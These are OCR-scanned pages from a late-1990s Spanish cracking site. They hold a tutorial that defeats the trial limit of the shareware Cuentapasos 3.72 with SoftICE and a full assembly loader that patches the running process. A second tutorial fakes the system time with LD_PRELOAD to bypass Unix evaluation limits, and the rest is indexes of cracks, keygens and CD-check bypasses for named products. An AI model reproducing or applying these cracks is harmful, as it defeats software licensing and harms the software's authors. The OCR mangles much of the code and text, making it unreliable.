Addr:0FOD8BFC Ord: 697 (02B9h) Name: rtcBstrFromChar 
Addr:0F0D8C43 Ord: 698 (02B Ah) Name: rte VarBstrFromChar 
Addr:0FOD7CF9 Ord: 699 (02BBh) Name: rtcSetCurrentCalendar 
Addr:0F01B38D Ord: 700 (02BCh) Name: rtcGetCurrentCalendar 
Addr:0F0D25C9 Ord: 999 (03E7h) Name: TipInvokeMethod2 
Addr:0FOD26F0 Ord:1016 (03F8h) Name: TipInvokeMethod 
Addr:0FOECSAO Ord: 1024 (0400h) Name: ¡ID_IVbaHost 
Addr:0F0170E9 Ord:1025 (0401h) Name: EbGetObjConnectionCounts 
Addr:0FOS5A1D9 Ord:2000 (07D0h) Name: CreatelExprSrvObj 
Addr:0F0D1387 Ord:2010 (07DAh) Name: EbGetVBAObject 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


progrAmA Cuentapasos 3.72 W95 


El programa cuentapasos es una utilidad para controlar 
DEsCripCión el gasto telefonico, con los ultimos planes (los bononets) 
que telefonica a puesto. 


Como comentario, no voy a hacerlo estilo Carrascal, sino decir 
que este crack funciona para el cuentapasos 3.72 con las siguientes 
caracteristicas: 


Fichero: cpasos32.exe 
Tamaño: 531.611 bytes 


ComEntArio Fecha: 30/3/99 


Digo esto, porque me han informado que el autor ha modificado 
el ejecutable haciendolo mas pequeño, pero todavia no me lo he 
bajado para comprobarlo. ;) 


Introducción 


Lo primero de todo, mandar unos saludetes a todOs los colegas de la scene 
del 
cracking hispano, ya que segun veo parece que estamos remontando el vuelo, a ver 
si algun dia llegamos a hacer una pagina semejante a la de +fravia. 


Bueno, he escogido este programa porque es bastante popular al menos que yo 
sepa en españa, y al parecer no habia un crack para el y decidi intentar remediarlo. 


> 
Vi 


Al Atake 


Veamos, despues de instalar el programa, al ejecutarlo vemos que nos sale una 
nagscreen avisandonos que no estamos registrados y que tenemos un periodo tipico 
de prueba de 30 dias. 


Al ser un programa hecho en Visual Basic, nos aseguramos que en el fichero 
winice.dat del softice este la linea: 


EXP=CXAWINDOWSIS YSTEMIMSVBVM50.DLL 


Hechas ya las presentaciones, vamos a intentar abordarlo con los siguientes 
breakpoints que a mi entender son bastantes utiles a la hora de crackear programas 
hechos en Visual Basic, que son lo siguientes: 


rícDoEvents 
rtcMsgBox 

_ vbaNew 

_ vbaNew2 
rtcInputBox 
rtcGetTimer 
rtcUpperCaseVar 
rtcUpperCaseBstr 


Pues bien, el primer paso que tenemos que dar es buscar donde el programa 
toma la eleccion de seguir cuando nosotros pulsamos aceptar o salir cuando 
pulsamos el boton correspondiente; de esta lista probamos en esta ocasion con 
rtcDoEvents, asi que nos vamos 
al softice ponemos bpx rtcdoevents, y pulsamos Ctrl-D con lo que volvemos a la 
nagscreen y pulsamos aceptar; inmediatamente despues volvemos al softice y 
pulsamos una vez F12 con lo que nos situamos en las siguientes lineas: 


Pulsamos F10 


0137:00474963 call [MSVBVMS5O0O!rtcDoEvents] 
0137:00474969 mov dword ptr [ebp-04],00000051 
0137:00474970 lea ecx,[ebp-64] 


0137:00474973 push ecx 
0137:00474974 call [MSVBVMS50!rtcGetPresentDate] 
0137:0047497A lea edx,[ebp-64] 


Vamos pulsando F10 


0137:004749B2 push edx 

0137:004749B3 push 02 

0137:004749B5 call [MSVBVM50!rtc__vbaFreeVarList] 
0137:004749BB add esp,0C 

0137:004749BE movsx eax, word ptr [ebp-00D4] 


0137:004749C5 test eax,eax ---> si eax=0 sale, no sigue y termina el 
programa. 
0137:004749C7 jz004761B3  ---> sieax=-1 entonces sigue 


0137:004749CD mov dword ptr [ebp-04],00000052 

0137:004749D4 cmp dword ptr [0054F200],00 

0137:004749DB ¿nz 4749F9 ---> Si eres un chico bueno sigue para adelante 
en caso contrario si eres un chico malo 
se acabo tu andadura. 


Bueno, bueno, bueno, segun parece hemos encontrado el lugar donde despues 
de pulsar sobre uno de los dos botones de la nagscreen el programa hace una cosa u 
otra dependiendo de si aceptas o deseas salir. Luego ya tenemos la direccion donde 
despues de multiples calculos de conversiones de tipos de datos tipicos del Visual 
Basic, esquema de proteccion del autor (de la cual se podria hablar en otro tutorial), 
etc, etc, etc, se dirige el programa. Luego recapitulemos, ya sabemos donde tiene 
que saltar para proseguir el programa, ahora nos hace falta saber desde donde lo 
podemos llamar. ¿Que se os ocurre? 
a mi personalmente despues de ver lo bien que ha funcionado el breakpoint del 
rtcDoEvents, 
voto por volverlo a usar pero ahora antes de que salga la nagscreen. 


Empezamos otra vez, ponemos el breakpoint del rtcDoEvents, y vamos 
pulsando Ctrl-D hasta uno antes de que salga la famosa nagsreen (tenemos que 
pulsar 4 veces Ctrl-D) 
con lo que nos encontramos con lo siguiente: 


* Vamos pulsando Fl0 * 


0137:00477D06 call [MSVBVM50!rtcDoEvents] 
0137:00477D0C wait 

0137:00477DO0D push 00477D66 
0137:00477D12 ¡mp 00477D5C 


0137:00477D5C lea ecx,[ebp-24] 
0137:00477D5F call [MSVBVMS50!__ vbaFreeStr] 


0137:00477D65 
0137:00477D66 
0137:00477D69 
0137:00477D70 
0137:00477D71 
0137:00477D72 
0137:00477D73 
0137:00477D75 
0137:00477D76 


0137:004741D6 
0137:004741 


0137:004741E2 
0137:004741E9 


ret 

mov ecx,[ebp-20] 

mov fs:[00000000],ecx 
pop edi 

pop esi 

pop ebx 

mov esp,ebp 

pop ebp 

ret 0004 


call 00476F50  ---> Todo el meollo de la proteccion 

mov dword ptr [ebp-04],0000003F ---> regresa aqui despues 
del anterior ret 0004 

cmp dword ptr [0054B7AC],00 

jnz 00474207 


Pues bien, a partir del JNZ 00474207 empieza a decir que no estamos 
registrados, que si es un version de evaluacion, .... Luego si en vez de que ese CALL 
00476E50 llame todas las comprobraciones que lleva a cabo ponemos la direccion 
que obtuvimos antes donde proseguia el programa, VOILA ;). 


Cambiamos el call 00476F50 por call 004749F9. Pero Houston, Houston, 
tenemos un problema, el parche no podemos aplicarlo con un editor hexadecimal 
(bendito Visual Basic), pues bien aqui tenemos dos opciones: 


- Usar el Proccess Patcher v2.4 de thewd 
- Usar el Tasm 5.0 


Si usas el Tasm 5.0: 


; Basado en el loader.exe original de Hayras [tNO '98] 


; Tienes que usar Tasm 5.0 8 import32.lib para compilarlo 


; tasm32 /ml crack.asm 
; tlink32 /Tpe /aa /ccrack,, <path to> import32.lib 
; reemplaza <path to> donde este la libreria import32.lib 


.386P 
Locals 
jumps 


.Model Flat ,StdCall 


¡Definimos las funciones externas y constantes que necesitamos. 


Extrn  MessageBoxA:PROC 
Extrn  WaitForInputldle:PROC 


Extrn  WriteProcessMemory:PROC 
Extrn  ReadProcessMemory:PROC 
Extrn CreateProcessA:PROC 
Extrn CloseHandle:PROC 

Extrn ExitProcess:PROC 


.Data 

CSiR_Tag db 'Lector PE £ CRACKER Por esiel2 -1999-'0 
CSiR_Error db 'Error!!!',0 

CSiR_Errorl db 'Algo se jodio...',0 

OpenERR_txt db 'Error con el CreateProcess :(',0 
ReadERR_txt db 'Error con el ReadProcessMemory :(,0 
WriteERR_txt db 'Error con el WriteProcessMemortry :P",0 
VersionERR_txt db 'No es la version 3.72 del cuentapasos :(*,0 
CSiR_ProcessInfo dd 4 dup (0) 

CSiR_StartupInfo db 48h dup (0) 

CSiR_RPBuffer db 10h dup (0) 


CSiR_AppName db 'cpasos32.EXE',0 
fuck dd 004741d6h 
sizeof dd 5 


checkbytes db 0e8h,075h,02dh,0,0 


patch_data_1 db Oe8h,01eh,08h,0,0 
patch_size_1 dd 5 
patch_addr_1 dd 004741d6h 


.Code 

Main: 
push offset CSIR_Tag 
mov  dword ptr [CSiR_StartupInfo],44h 
push offset CSiR_ProcessInfo 
push offset CSiR_StartupInfo 
push 0 
push 0 
push 20h 
push 0 
push 0 
push 0 
push 0 
push offset CSIR_AppName 
call CreateProcessA 


test  eax,eax 
jz  OpenERR 


Wait4Depack: 
push LARGE-1 
push  dword ptr [CSiR_ProcessInfo] 
call WaitForInputldle 


Check_Data: 


push 0 

push  dword ptr [sizeof] 

push offset CSiIR_RPBuffer 

push  dword ptr [fuck] 

push  dword ptr [CSiR_ProcessInfo] 
call ReadProcessMemory 

test  eax,eax 


jz  ReadERR 
¡int 03 ;-) 
cld 


lea  esi, CSiIR_RPBuffer 
lea edi, checkbytes 
mov  ecx,5 

rep cmpsb 

jnz VersionERR 


Patch_the_mother: 
push 0 
push  dword ptr [patch_size_1] 
push offset patch_data_1 
push  dword ptr [patch_addr_1] 
push  dword ptr [CSiR_ProcessInfo] 
call WriteProcessMemory 
test  eax,eax 
jz WriteERR 


Close_This_app: 
push  dword ptr [CSiR_ProcessInfo] 
call CloseHandle 
push  dword ptr [CSiR_ProcessInfo+4] 
call CloseHandle 


Exit_Proc: 
Push LARGE-1 
Call ExitProcess 


VersionERR: 
lea  eax, VersionERR_txt 
jmp  abort 

ReadERR: 
lea  eax, ReadERR_txt 


jmp  abort 
OpenERR: 
lea  eax, OpenERR_txt 
jmp  abort 
WriteERR: 
lea  eax, WriteERR_txt 
abort: 
push 0 
push offset CSIR_Error 
push eax 
push 0 
call MessageBoxA 


jmp Close_This_app 


End Main 


Se acabo por esta vez, espero que me haya explicado bien, hasta otra.... 


wen 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


E - 
Whiskey Kon Tekila 


. 
Whiskey Kon Tekila 


progrAmA Programas de evaluación en UNIX UNIX 


po Sharewares, Demos 

| protECCión Limitaciones en el tiempo de uso. 

[— DiFICUltAD 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
hErrAmiEntAs Una Librería dinámica propia : Mi_Time 

| CrACkEr [Bart 

[FECHA |24de Octubre de 1998 


Introducción 


La verdad es que no trabajo en Windows mucho, mi campo en mas bien el Linux, 
en este caso tengo un truquillo que puede serviros, para saltarse la proteccion de la 
copias de programas de evaluacion. 


Consiste en hacer creer al programa que esta viviendo en un tiempo distinto, 
gracias a las librerias dinamicas y a la variable de entorno LD_PRELOAD 
No se si esto es extensible de algun modo a las DLL de Windoze. 


CREO QUE ES VALIDO PARA TODO SISTEMA UNIX, NO FUNCIONA CON 
PROGRAMAS CON EL BIT DE SUID ACTIVADO, PUES ELLOS NO 
ACCEPTAN EL LD_PRELOAD. 


Al Atake 


MODO DE EMPLEO: 


Quitar la proteccion al programa "EXE" que tien 


evaluacion 


1) creo funciones de tiempo 


en un momento en el qu 
licencia de 30 dias o lo 


cuenta d 


en una libreria y que tiene tiempo fijado 
1] programa de evalucion funciona con 
que sea. 


2) uso el programa "strace" y "grep" 
Sstrace EXE 2> zz; grep "time(NULL)" zz;¿rm zz 
time (NULL) = 908959851 
3) aparece un numero: N_time crack = 908959851 
time returns the time since the Epoch (00:00:00 UTC, Jan- 
uary 1, 1970), measured in seconds. 
4) Mi libreria dinamica: 
mi_time.so.1.0 
Se carga antes que la del sistema: 


S$mv EXE EXE.orig 


asi el fichero EXE es un script ahora 


(parecido a un .bat del MSDOS) 


export LD_PRELOAD=/1ib/libmi_time.so.1.0 


EXE.orig 

5) Incluyo todo en un atachment (_Mi Time ) 

Un saludo a todos los ECD-mailers. 
| ESVAVAVAVAVA | 
| | | N | 
| | | [Elvis ds |] 
| Lo o_—_ | |. dead! |] 
| O | 
| ex iló!] Tal Zo] bart. | | 
| | mn. ou | AN y | 
| | | 1/ | 
| NU 1/ 1 | 
| IZA | 
| 7] PAN | 
| | 
Linux: The choice of a GNU generation 


"My opinions are my own, 


and I've get *lots* of them!" 


KAKXKKXKKKKKKKKK KK KK KKKKKKKKKKKK KK KK KK KK KK KKKKKKAK 


W98 supports real multitasking - it can boot and crash simultaneously 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Programa Xxx | W95 / W98 / NT 
A AA 
MA a e ias 

Url http://www 
[Protección  |NagSereen. Time Limit 30 Dias 
[Dificultad [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas  [Softlce v3.25, W32dasm v8.9, UltraEdit v6.10a 
Objetivo [Simular estar registrados. 
O 


Lu 
Introducción 

wr 
Al Atake 
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Última Actualizacion: 01/11/99 


ECD MIRRORS: 


Esta es la lista de páginas oficiales para consultar el ECD: 


m Crackz Web Site 


= http://ecd.tsx.org 
= http://w56.org/ecd 


Esta última url http://w56.org/ecd es un desvio aleatorio a cualquiera 


de los mirrors. 
Por lo que os recomendamos que lo utiliceis si quereis ponernos un 


link en vuestra web. 


ULTIMAS NOVEDADES: 


Saludos a todos! Parece que por fin la Cracking-Scene-Hispana 
comienza a dar muestras de una gran actividad. Son muchos y muy 
buenos los artículos que he recibido en estas dos últimas semanas : 


. Cuentapasos v3.75 

. Registry Studio V1.01 
Code Snippet Creator v1.05: Archivos PE 
La Memoria en W32: Intro 
. Reversing with ToPo v1.0 

. Lake Clear Animato v1.0c 

. Productos RKS Software 

. Winboost 2000 v1.0.0.1999 
. Kyodai v10.21 

. Quick Heal v5.20 

. Ultraedit v6.20b 

. WinGest v3.5 

. Toggle Mouse v3.4.3 

. WkT! Faq Oficial página 1 
. WkT! Faq Oficial página 2 
. WkT! Faq Oficial página 3 


Roa a a a pa pa 


Una visita obligada es la sección de Documentos Genéricos donde 


encontrarás la última revisión de la WkT! Faq Oficial, un artículo muy 
completo sobre el formato de los archivos PE, un artículo sobre la 
Memoria en W32 y un tutorial sobre cómo utilizar Topo v1.0, además 
de otros documentos igualmente interesantes. 


AGRADECIMIENTOS: 


WKkT! agradece a todos sus colaboradores su ayuda con el proyecto 
ECD, y su inestimable apoyo moral. Muchas gracias a todos los que 
visitals nuestros forums sobre Ingenieria Inversa y nos abrasais a 
preguntas. 

Gracias a TNT! y KuT! por sumarse al proyecto ECD con sus ensayos 
de Ingenieria Inversa. Thanks to Crackz for his mirror. 


COLABORA CON EL PROYECTO ECD: 


La versión Inglesa del ECD se encuentra en fase de preparación. 
NECESITAMOS TRADUCCIONES !! 

Si se te da bien el Ingles y te gustaria colaborar en el proyecto ECD, 
por favor, traduce alguno de estos tutoriales al Ingles y envia la 
traducción a wktObigfoot.com 


(conserva el formato original, gracias) 


¡OJO : Cuestiones legales a tener en cuenta. | 


ESTUDIO COLECTIVO DE DESPROTECCIONES: 


Este site nace con el objetivo de recopilar tutoriales en castellano sobre 
el noble arte del cracking, para de esta manera favorecer el aprendizaje 
de las técnicas de debugging, imprescindibles para defendernos de los 
bugs (mayormente intencionados, o sea protecciones) que los 
fabricantes de software introducen en sus programas, que no lo 
olvidemos, residen en nuestro disco duro, por lo cual deberíamos ser 
libres de poderlos modificar a nuestro antojo. 

(Uf, vaya frase...;-) 


NOTA PARA EL PROGRAMADOR INDIGNADO QUE ESTA LEYENDO 
ESTAS PAGINAS 


Si eres de los que piensan que los crackers estamos de mas, que lo 
unico que hacemos es perjudicar a las casas de soft, que te estamos 
robando dinero......... bien, quiza lo verias todo de manera distinta desde 
"el otro lado". Si, has leido bien, te estamos invitando a que te 
introduzcas en el mundo de la Ingenieria Inversa. Te invitamos a leer 
tutoriales, a crackear tus propios programas y aprender como 
PROTEGERLOS MEJOR. 

¿Perplejo? pues no deberias estarlo, en lugar de quejarte de nuestro 
comportamiento y abrir la veda de la "caza al cracker", lo mejor que 
puedes hacer es aprender de tus errores y de los demás. Despues de 
todo, el "trabajo sucio” lo hemos hecho por ti. ;0) 

Aunque parezca extraño, WkT! está dedicado a formar a los 
programadores , mostrándoles sus defectos y el camino para producir 
software de calidad. 


Crackea Jacta Est 


Entendemos por tutoriales, la explicación de cómo se desprotege un 
determinado programa. 

Se puede acceder a todos ellos a través de las 3 páginas de índices, 
cada una de las cuales está ordenada de diferente manera : 


e Por Tipo de Protección : Cd-Checks, Mochilas, Limitaciones 
de tiempo, .... ) 

e Por Fecha de Publicación : Util para ir siguiendo las 
novedades publicadas. ) 

e Por Orden Alfabético : Util para buscar un programa en 
concreto. 


Pero aún hay más, y son los documentos genéricos, que explican algun 
tema concreto. 

Por ejemplo, la FAQ de Cracking, Cómo Crackear, Introducción al 
Softlce, VBS, .... 

De momento están agrupados en Documentos Genéricos , y si más 
adelante hace falta, ya se dividirán en subgrupos. 


ECD idea original de Mr.Brown. 

Primeras páginas creadas por Mr.Brown, retocadas, mantenidas y 
optimizadas a 800x600 para Netscape y Opera por Mr.WhiTe. 
Cualquier colaboración será bien recibida, así que anímate: 
Haznos llegar tus documentos con este formato 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


COMPRESION / DESCOMPRESION 

Code Snippet Creator v1.05: (W95/W98/NT) 

Descabezando archivos ejecutables portables 

Comprender la estructura y el contenido del encabezado de los 
archivos con formato PE 


Editor hexadecimal, ProcDump v1.5, 
Octubre de 1999 nuMIT_or [W32DASM32 8.93 y/o IDA PRO, 
EXeScope v4.40, Softlce (opcional) 


La Memoria en W32: Intro (W95/W98/NT) 


Suministrar conocimiento que permita comprender cómo W32 
traduce direcciones virtuales en direcciones físicas. 


Editor hexadecimal, ProcDump v1.5, 
W32DA5SM32 8.93 y/o IDA PRO, 
EXeScope v4.40 (opcional), Softlce 


Reversing with ToPo v1.0 (W95/W98/NT) 


Cómo usar ToPo v1.0 


| : Topo v1.0, Uedit y (opcionalmente) 
23/10/99 Mr.Crimson SoftICE 


[Descompresión manual con ProcDump (W95) 
¡Como usar el ProcDump para descomprimir/desencriptar tus cobayas. 
(31/08/99 Mr.Orange ¡Softlce v3.25, ProcDump 


Winboost 2000 v1.0.0.1999 (W95/W98/NT) 


Cómo saber si un programa esta comprimido. Uso del ProcDump. 
Cómo eliminar una "protección anti-desensamblado" 


¡Obtener un número de Serie Válido 

: ProcDump v1.5, Gettyp v2.38, 
Ú sd Me-Walle | rs2dasm 18:93. UltaEdit v6 104 
[WkT!] FAQ 


[12 [3] [WT] 1999 


Respuesta a las Preguntas típicas de Ingenieria Inversa 


>» 
Win 


Como Crackear por Estado+Porcino 


Como Crackear por O | 
Estado+Porcino. Capítulo 7 PLLIO PIS. 


Curso de CrAcKinG. 7) Desclavando cruces con o ose de Arimatea. 
-Como Crackear Ulead Media Studio Pro v5.01- ;- 


Como Crackear por AE " ¡0ñó 
Estado+Porcino. Capítulo 6 Aaa ROrDO! (HbIO 

Curso de CrAcKinG. 6) Desvirgando Expedientes X 

-Como Crackear Contaplus Elite Pyme- ;-?) 

Como Crackear por Meal dd 
Estado+Porcino. Capítulo 5 e A 
Curso de CrAcKinG. 5) Color Crack. (Quien dijo ke el amarillo daba 
mala suerte ;-?) 


Como Crackear por MER EOS 
Estado+Porcino. Capítulo 4 ai nds 
Curso de CrAcKinG. 4) Haciendo de Cerrajeros 


Como Crackear por. Mr Pink Mayo 1998 


Curso de CrAcKinG. 3) Corta Historia del Tiempo 


E a is 
Estado+Porcino. Capítulo2. [PLCTIT0O POS 


Curso de CrAcKinG. 2) Diseccionando a los Muertos 


Como Crackear por Estado+Porci Diciembre 1997 
Estado+Porcino. Capítulo 1 | a 


[Curso de CrAcKinG. 1) Orígenes 


¡SoftIce Debugger 


[Introducción al Softlce Mr.Brown [1998 
[Instalación y Consejos para iniciarse en el Debugger Softlce 


[Comandos del Softlce Mr.Brown 11998 
[Referéncia Resumen de los comandos disponibles en el Softlce 3.22 


[Uso de Breakpoints Mr.Brown 11998 
[Recomendaciones e Ideas sobre Puntos de Ruptura en el Softlce. 


Ingenieria Inversa Utilizando la función Mr. WhiTe (1999 
HMEMCPY Ae 


¿Qué es y cómo utilizar HMEMCPY? 


WEA 


[Visual Basic Cracking 


[Cuentapasos v3.75 (W95/W98/NT) 
¡Simular estar registrados. 


18/10/99 MéBIS Softlce v4.0, SmartCheck 
6.0, Spy++ 


[Advanced Video Poker v1.1 (W95) 


Buscar el número de serie y crear su Key-Generator 


14/08/99 Mr.GReeN E v6.01 (Build 


[Crackeando en VB [Esiel2 ¡Junio de 1999 


Este tutorial contiene lo basico a mi entender que debes saber de 
herramientas y de algunas funciones que tanto le gusta llamar al 
Visual Basic. 


[CuentaPasos v3.72 [Esiel2 (02/05/99 


Conseguir que no caduque nunca el programa. 


Funciones del Visual Basic 

E Mr.Brown 1998 

Listado de las funciones de msvbvm50.DLL, para tracear pgms de 
E 


Win 


UNIX Cracking 


Programas de Evaluación limitados por 
Fes Bart ¡Octubre 1998 


Cómo saltarse la protección de programas de evaluación. 


[ Plantilla en formato htm | Plantilla en 
formato zip ] 
Win 
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| Indice por Tipo de Protección 


Mochilas, Dongles, Hardware Key, .... 


[MatLab 5 (W95) 
¡Estudio y desprotección de la mochila. 
[Enero 98 |+Aitor ISoftlce 3.2, Wdasm 8.X, Editor Hexadecimal 


¡Cd-Checks, 20d 


[Commandos Behind the Enemy Lines (W95) 
[Evitar el Cd-Check. 


15/90/98  [Mr.Brown [SoftIce 3.22, IDA Pro 3.75, Editor 
Hexadecimal 


[NEED FOR SPEED 3 (W95) 
[Evitar el Cd-Check. 
107/06/99 [Mr.WhiTe ¡W32Dasm v8.9, Editor Hexadecimal 


>» 
we 


¡Generadores de Llaves, KeyMakers, .... 


[Lake Clear Animato v1.0c (W95/W98/NT) 
¡Obtención de un número de Serie Válido y creación de KeyMaker 
[21/ 10/99 [Mr.Green ¡Softlce v3.24 


[Productos RKS Software (W95) 
¡Obtención de un número de Serie Válido y creación de KeyMaker 
118/ 10/99 [Mr.Green ¡Softlce v3.24 


[File Compare Utility 3.0.002 (W95) 
[Hacer un Generador de claves (KeyGen). 
101/03/99 ¡Mr.Brown ¡Softlce 3.22, JavaScript 


[Revival 2.1 (W95) 
[Explicación para hacer un Generador de Llaves. 
¡Octubre 98 [Mr Pink ¡Softlce, IDA Pro 3.75, Compilador de C 


Win 


Shareware: Pantallas molestas (Nag Screens), .... 


[Ulead PhotolImpact v4.2 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


so 107/99 Mew EA v3.25, W32dasm v8.9, UltraEdit 


[Lotus SmartSuite Millenium Edition (W95) 
Conseguir que no caduque el programa y NagScreen. 


1 3/07/99 MrwaTe E v3.25, W32dasm v8.9, UltraEdit 


[CuentaPasos v3.72 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


02/05/99 [Esiel2 Softlce 3.22, Tasm 5.0, Process Patcher v 2.4 
(opcional). 


[PhotoLine 4.53 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(20/ 11/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


[TextPad 3.2.4 (W95) 
¡Saltarse el aviso inicial de shareware 
Julio 98 ¡Mr.Brown ¡Wdasm 8.9, Editor Hexadecimal 


[Logical (DOS) 
[Evitar la pantalla inicial de introducción de password. 
Julio 98 [Mr.Brown ¡SoftIce 3.22, Editor Hexadecimal 


Shareware: Limitaciones de Funciones, .... 


[Ulead Video Studio v3.0 (W95) 

Conseguir que no caduque el programa, NagScreen y otras 
limitaciones 

14/09/99 [Mr.Orange [WkT!] ¡Softlce v3.25 


[English-Spanish Interpreter 2000 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(25/08/99 [Mr.Crimson ¡Softlce v3.25, TechFacts 95 


¡Slim Show 3.1 (W95) 


'Q uitar las limitaciones de la versión Shareware. 


29/9/98 [Mr Pink Softlce 3.22, IDA Pro 3.75, Editor 
Hexadecimal 


[Backgammon Pro (W95) 
¡Quitar límite de partidas para la versión shareware 
J ulio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


Shareware: Buscar Números de Registro, Serials, .... 


Winboost 2000 v1.0.0.1999 (W95/W98/NT) 


Obtener un número de Serie Válido 


: ProcDump v1.5, Gettyp v2.38, W32dasm 
Ú id MrwaiTe e UltraEdit v6.10a 


Kyodai v10.21 (W95/W98/NT) 


Obtener un número de Serie Válido 


17/10/99 mo 


WinGest v3.5 (W95/W98/NT) 


ProcDump v1.50, Gettyp for Dos v2.35, 
Softlce v3.24, W32dasm v8.93, UltraEdit 
v6.10a 


Obtención de un número de Serie Válido 


107/07/99 [XASX ¡Softlce 939.23 


Advanced Video Poker v1.1 (W95) 


Buscar el número de serie y crear su Key-Generator 


14/08/99 [Mr.GReeN ¡Smartcheck v6.01 (Build 952) 


Exploit Submission Wizard 5 (W95) 


Conseguir la clave para registrarse. 


101/06/99 [Esiel2 ¡Softlce v3.24 


[Talisman 1.1 (W95) 
¡Conseguir la clave para registrarse. 
[11/5/99 ¡Mr.WhiTe ¡SoftIce 3.24 


[Picture Explorer 1.21 (W95) 
¡Conseguir la clave para registrarse. 
109/01/99 [Mr.Grey ¡Wdasm 


[KAWA 3.13 (W95) 
¡Conseguir la clave para registrarse. 
109/01/99 [Mr.Grey ¡Softlce 3.24 


Java Script It ! v1.3 (W95) 


[Conseguir la clave para registrarse. 
107/01/99 [Esiel2 ¡SoftIce v3.24 


[Cover Your Tracks 3.1 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24 


[AddSoft 2.26 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


Uninstall Manager 2.60 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 11/98 [Mr.Grey ¡SoftIce 3.24 


[CaseLinr 5.4 (W95) 
¡Conseguir la clave para registrarse. 
108/ 11/98 [Mr.Grey ¡Softlce 3.24 


[AScreens 1.27 (W95) 
¡Conseguir la clave para registrarse. 
[251 10/98 [Mr.Grey ¡Softlce 3.24 


[AxMan 2.21 (W95) 
¡Conseguir la clave para registrarse. 
(25/ 10/98 [Mr.Grey ¡SoftIce 3.24 


[A-X.E. 2.0) (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey ¡Softlce 3.24 


[DI Show 3.7 (W95) 
¡Conseguir la clave para registrarse. 
118/ 10/98 [Mr.Grey ¡Softlce 3.24 


Font Look 3.2, Directory Printer 1.8, Super Text Search 1.6 
E ) 


¡Conseguir la clave para registrarse. 
15/8/98 ¡Mr.Brown ¡SoftIce IZ 


[Internet Organizer 3.1 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Wdasm 8.9 


[Submission Wizard 4 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 [Mr.Brown ¡Softlce 3,22 


[Html Validator v2.55 (W95) 
¡Conseguir la clave para registrarse. 
Julio 98 ¡Mr.Brown ¡SoftIce 2 


[Norton CrashGuard Deluxe 3.0 (W95) 


Conseguir la clave para registrarse. Protección Cinderella, "Turnkey 
Popper” basada en la librería RSAGNT32.DLL 

[Mayo 98 [Estado+Porcino ¡Wdasm 8.X , Softlce 

[Uedit 5.0 (W95) 


¡Conseguir la clave para registrarse. 
[Enero 98 [Estado+Porcino ¡Wdasm 8.X , Softlce 


Shareware: Engañar el registro, Serial, .... 


[Quick Heal v5.20 (W95/W98/NT) 
¡Simular estar registrados. 
113/ 10/99 Kolgado ¡Softlce v4.01 


Toggle Mouse v3.4.3 (W95/W98/NT) 


Cracking: Primeros pasos. Conocimientos básicos de ensamblador. El 
registro de Windows. 


¡Simular estar registrados. 
25/08/99 Maniac PC W32dasm v8., UltraEdit v6.10a, 
Registry Monitor 


[Registry Studio V1.01 (W95/W98/NT) 
¡Simular estar registrados. 


Softlce v4, W32dasm v8.9, 
20/1059 Barpota a HEX (A tu Gusto ) 
[TogglePopDesk v1.1A (W95) 


¡Simular estar registrados y obtener un número de Serie Válido 
107/09/99 Mr.WhiTe ¡W32dasm v8.93, UltraEdit v6.10a 


[TogglePing+ v1.1A (W95) 
¡Simular estar registrados y obtener un número de Serie Válido 


107/09/99 Mr.WhiTe ¡W32dasm v8.93, UltraEdit v6.10a 


[Ultraedit v6.10a (W95) 
¡Simular estar registrado. 


| ] de v3.24, W32dasm v8.9, 
15/07/99 Mr.WhiTe UltraEdit v5.0a 
[CdrLabel 4.1 (W95) 


¡Simular estar registrado. 
[15/ 8/98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[SemPoint 2.25 (W95) 
¡Simular estar registrado. 
113/ 8/98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[Hex WorkShop 2.51 (W95) 
¡Saltarse el registro. 
J ulio 98 Daniel ¡Wdasm, Editor Hexadecimal 


[Quick View plus 4.0 (W95) 
¡Saltarse el registro. 
y ulio 98 Daniel ¡Wdasm, Editor Hexadecimal 


[WinRAR 2.04 (W95) 
¡Simular estar registrado. 
y ulio 98 Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


[TechFacts 95 (W95) 
¡Simular estar registrado. 
[Diciembre 97  |Estado+Porcino ¡SoftIce 3.0, Editor Hexadecimal 


Shareware: Limitaciones de Tiempo, .... 


[Cabinet Manager 98 2.0 (W95) 
¡Conseguir que no caduque nunca el programa. 
108/ 11/98 ¡Mr.Grey ¡SoftIce 3.24, Hex Workshop 2.54 


> 
hi 


Shareware: Zen Cracking, .... 
[Ulead Media Studio Pro v5.01 (W95) 


Conseguir que no caduque el programa, NagScreen y eliminar una X 
muy molesta. 

. Softlce v3.25, Referencia 
210959 Estado+Porcino API32 


[Multimedia Builder 3.0 (W95) 
¡Observación de los colores para crackear ;-) 
¡Noviembre 98 [Mr Pink ¡Softlce 


Wen 
[ Plantilla en formato htm | Plantilla en 
formato zip ] 


> 
Wi 
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Indice por Fecha de Publicación 


Octubre 1999 


Registry Studio V1.01 (W95/W98/NT) 


Simular estar registrados. 


Softlce v4, W32dasm v8.9, Heditor 
so 10/99 Karpoff HEX (A tu Gusto ) 
Code Snippet Creator v1.05: (W95/W98/NT) 
Descabezando archivos ejecutables portables 
Comprender la estructura y el contenido del encabezado de los 
archivos con formato PE 


Editor hexadecimal, ProcDump v1.5, 
